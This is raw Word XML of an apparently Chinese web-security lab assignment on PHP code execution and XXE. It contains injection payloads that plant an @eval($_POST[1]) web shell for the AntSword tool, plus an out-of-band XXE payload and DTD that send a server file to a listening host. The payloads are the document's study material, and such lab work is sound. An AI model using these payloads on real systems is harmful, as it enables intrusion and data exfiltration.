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>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复习我们今天学过的代码执行的题目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试闭合然后使用蚁剑进行连接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$a = $_GET['cmd'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$data = "array('a'=&gt;'aaaa',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>'b'=&gt;'222222',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>'c'=&gt;'',111=&gt;\"($a)\",222=&gt;'22'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>)";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>eval("\$arr = $data;");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>?&gt;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闭合方式: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cmd='1')");@eval($_POST[1]);/*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i/>
                <w:color w:val="8C8C8C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF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8C8C8C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Post 1=phpinfo();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="2508885"/>
            <wp:effectExtent l="0" t="0" r="4445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83225" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="317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</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试闭合并且用蚁剑进行连接:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>error_reporting(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$sort_by = $_GET['sort_by'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$sorter = 'strnatcasecmp';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$func = create_function('$a,$b', $sort_function);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$func(1,$sort_by);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>?&gt;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http://www.localhost.com/diy/codeExec/test5.php?sort_by=0"], $b["0"]); }@eval($_POST[1]);/*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post提交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1=phpinfo();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="2299335"/>
            <wp:effectExtent l="0" t="0" r="444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82590" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="381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描述xxe漏洞产生环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="19024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每一行做了什么事情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7FAFF"/>
              </w:rPr>
              <w:t>开启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7FAFF"/>
              </w:rPr>
              <w:t>外部实体引用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7FAFF"/>
              </w:rPr>
              <w:t xml:space="preserve">libxml_disable_entity_loader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7FAFF"/>
              </w:rPr>
              <w:t>false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7FA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put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7FAFF"/>
              </w:rPr>
              <w:t>伪协议接收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7FAFF"/>
              </w:rPr>
              <w:t>字符串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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t xml:space="preserve">$xmlfile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7FAFF"/>
              </w:rPr>
              <w:t>file_get_contents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7FAFF"/>
              </w:rPr>
              <w:t>'php://input'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7FA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DOM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7FA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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t xml:space="preserve">$dom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7FA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DOMDocument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>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7FAFF"/>
              </w:rPr>
              <w:t>从一个字符串中加载一个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xml,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7FAFF"/>
              </w:rPr>
              <w:t>成功时返回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 xml:space="preserve"> TRUE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7FAFF"/>
              </w:rPr>
              <w:t>， 或者在失败时返回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 xml:space="preserve"> FALSE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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>$dom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>-&gt;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7FAFF"/>
              </w:rPr>
              <w:t>loadXML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>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="660000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>$xmlfile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7FAFF"/>
              </w:rPr>
              <w:t>LIBXML_NOENT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>|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7FAFF"/>
              </w:rPr>
              <w:t>LIBXML_DTDLOAD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7FAFF"/>
              </w:rPr>
              <w:t>将一个字符串解释为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7FAFF"/>
              </w:rPr>
              <w:t>对象并返回</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="8C8C8C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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t xml:space="preserve">$creds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7FAFF"/>
              </w:rPr>
              <w:t>simplexml_import_dom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>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="660000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>$dom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>);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描述xxe的有回显和无回显如何利用,并且复现利用步骤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有回显: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直接在post请求体构造一个对应的数据包，如果读取的服务器文件有特殊字符，推荐使用php://filter伪协议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&lt;?xml version="1.0" encoding="utf-8"?&gt;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&lt;!DOCTYPE pio [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&lt;!ENTITY burry SYSTEM "php://filter/read=convert.base64-encode/resource=E:/phpstudy2018/PHPTutorial/WWW/1.txt"&gt; ]&gt;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&lt;pio&gt;&amp;burry;&lt;/pio&gt;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无回显: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虽然是无回显，但是既然能够执行文件读取的命令，那么可以让该服务器访问我们的远程公网vps1的dtd文件(该文件的作用是将读取到的内容发送到一个可以接收该内容的公网vps2)，同时我们需要监听vps2对应的端口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拦截的post数据包的内容为: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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE ANY [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 xml:space="preserve">    &lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini"&gt;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 xml:space="preserve">    &lt;!ENTITY % dtd SYSTEM "http://192.168.1.40/xxe_file.dtd"&gt;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%dtd;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%send;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7FAFF"/>
              </w:rPr>
              <w:t>]&gt;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利用步骤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Vps1的dtd文件的内容,ip为vps2的IP地址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5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&lt;!ENTITY % all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"&lt;!ENTITY &amp;#x25; send SYSTEM 'http://192.168.1.166:1122/?%file;'&gt;"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%all;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80685" cy="989330"/>
            <wp:effectExtent l="0" t="0" r="571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Vps2建立监听:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4099560" cy="44196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拦截数据包，修改后发送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485765" cy="2804160"/>
            <wp:effectExtent l="0" t="0" r="63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85130" cy="1541780"/>
            <wp:effectExtent l="0" t="0" r="1270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79415" cy="1908810"/>
            <wp:effectExtent l="0" t="0" r="6985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65BF7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2D765BF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8F09F1C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="38F09F1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39"/>
    <w:rsid w:val="00395A75"/>
    <w:rsid w:val="00423A87"/>
    <w:rsid w:val="005F5B84"/>
    <w:rsid w:val="00650282"/>
    <w:rsid w:val="006C1E89"/>
    <w:rsid w:val="007723B6"/>
    <w:rsid w:val="00873F73"/>
    <w:rsid w:val="008B2B13"/>
    <w:rsid w:val="009B0363"/>
    <w:rsid w:val="00A057E2"/>
    <w:rsid w:val="00C62A39"/>
    <w:rsid w:val="013941E9"/>
    <w:rsid w:val="028E6FAD"/>
    <w:rsid w:val="03FC5BD7"/>
    <w:rsid w:val="04EA3B3D"/>
    <w:rsid w:val="050E4A23"/>
    <w:rsid w:val="05CE5CC1"/>
    <w:rsid w:val="06434D9F"/>
    <w:rsid w:val="08A56933"/>
    <w:rsid w:val="0A6B7CA1"/>
    <w:rsid w:val="0B263D9C"/>
    <w:rsid w:val="0ED72DFD"/>
    <w:rsid w:val="0FC20047"/>
    <w:rsid w:val="102C165C"/>
    <w:rsid w:val="103040AE"/>
    <w:rsid w:val="11245700"/>
    <w:rsid w:val="115A7DCB"/>
    <w:rsid w:val="11CB0701"/>
    <w:rsid w:val="124652CF"/>
    <w:rsid w:val="13E10E97"/>
    <w:rsid w:val="164D4FF2"/>
    <w:rsid w:val="18AA7F53"/>
    <w:rsid w:val="1A3D2C2F"/>
    <w:rsid w:val="1A517E2A"/>
    <w:rsid w:val="1A85546F"/>
    <w:rsid w:val="1AB31268"/>
    <w:rsid w:val="1AF67C45"/>
    <w:rsid w:val="1E2E28C2"/>
    <w:rsid w:val="20E4346C"/>
    <w:rsid w:val="210F5015"/>
    <w:rsid w:val="23285EE2"/>
    <w:rsid w:val="23BE2EBF"/>
    <w:rsid w:val="23F2215D"/>
    <w:rsid w:val="24EA7DC6"/>
    <w:rsid w:val="283A5B43"/>
    <w:rsid w:val="293D0824"/>
    <w:rsid w:val="29EF32D0"/>
    <w:rsid w:val="2A8767F6"/>
    <w:rsid w:val="2AB810B3"/>
    <w:rsid w:val="2B2F5F10"/>
    <w:rsid w:val="2C655091"/>
    <w:rsid w:val="2DE574DE"/>
    <w:rsid w:val="2E5F2DD1"/>
    <w:rsid w:val="2F7E4701"/>
    <w:rsid w:val="30235485"/>
    <w:rsid w:val="31536DD1"/>
    <w:rsid w:val="323F7744"/>
    <w:rsid w:val="32F47D65"/>
    <w:rsid w:val="349A2EBC"/>
    <w:rsid w:val="36AD4D1D"/>
    <w:rsid w:val="36E66EAB"/>
    <w:rsid w:val="38CA5E66"/>
    <w:rsid w:val="39D62B4F"/>
    <w:rsid w:val="3B08437C"/>
    <w:rsid w:val="3BA55CF5"/>
    <w:rsid w:val="3C035758"/>
    <w:rsid w:val="3C9A4B0A"/>
    <w:rsid w:val="3D7242F2"/>
    <w:rsid w:val="3E1F4D9A"/>
    <w:rsid w:val="40561473"/>
    <w:rsid w:val="40B51424"/>
    <w:rsid w:val="42EF39A5"/>
    <w:rsid w:val="42FF73C0"/>
    <w:rsid w:val="43902146"/>
    <w:rsid w:val="43FE147B"/>
    <w:rsid w:val="464B4040"/>
    <w:rsid w:val="46865B29"/>
    <w:rsid w:val="46E341F1"/>
    <w:rsid w:val="476B69DB"/>
    <w:rsid w:val="48607C58"/>
    <w:rsid w:val="48A611F9"/>
    <w:rsid w:val="49146D37"/>
    <w:rsid w:val="4AAD0B6C"/>
    <w:rsid w:val="4B9843D4"/>
    <w:rsid w:val="4BD3300A"/>
    <w:rsid w:val="4C840E30"/>
    <w:rsid w:val="4CC00253"/>
    <w:rsid w:val="4D017E55"/>
    <w:rsid w:val="4D7068B9"/>
    <w:rsid w:val="4DB050F4"/>
    <w:rsid w:val="4E105DCB"/>
    <w:rsid w:val="4EA218C6"/>
    <w:rsid w:val="50614ED3"/>
    <w:rsid w:val="508E6718"/>
    <w:rsid w:val="520670C1"/>
    <w:rsid w:val="52C959D9"/>
    <w:rsid w:val="54381FA3"/>
    <w:rsid w:val="554F060B"/>
    <w:rsid w:val="561D4A02"/>
    <w:rsid w:val="56B97CA8"/>
    <w:rsid w:val="571D6A47"/>
    <w:rsid w:val="58BB0AFF"/>
    <w:rsid w:val="58CF7584"/>
    <w:rsid w:val="59D659A7"/>
    <w:rsid w:val="5ABF4B18"/>
    <w:rsid w:val="5AF87AAB"/>
    <w:rsid w:val="5F4D358A"/>
    <w:rsid w:val="5F9964B9"/>
    <w:rsid w:val="5FE8279D"/>
    <w:rsid w:val="602F60D0"/>
    <w:rsid w:val="62E81E51"/>
    <w:rsid w:val="64063D31"/>
    <w:rsid w:val="657B0915"/>
    <w:rsid w:val="67217631"/>
    <w:rsid w:val="6AAD43A2"/>
    <w:rsid w:val="6BEB35F8"/>
    <w:rsid w:val="6C5A3DFD"/>
    <w:rsid w:val="6FDE46D5"/>
    <w:rsid w:val="73BE47CA"/>
    <w:rsid w:val="74C73F4B"/>
    <w:rsid w:val="754C534F"/>
    <w:rsid w:val="75513148"/>
    <w:rsid w:val="75CE397A"/>
    <w:rsid w:val="785E27F5"/>
    <w:rsid w:val="7A57662D"/>
    <w:rsid w:val="7E315365"/>
    <w:rsid w:val="7EF25A5F"/>
    <w:rsid w:val="7FF8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422</Characters>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>495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2020-07-07T12:17:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-09T13:03:54Z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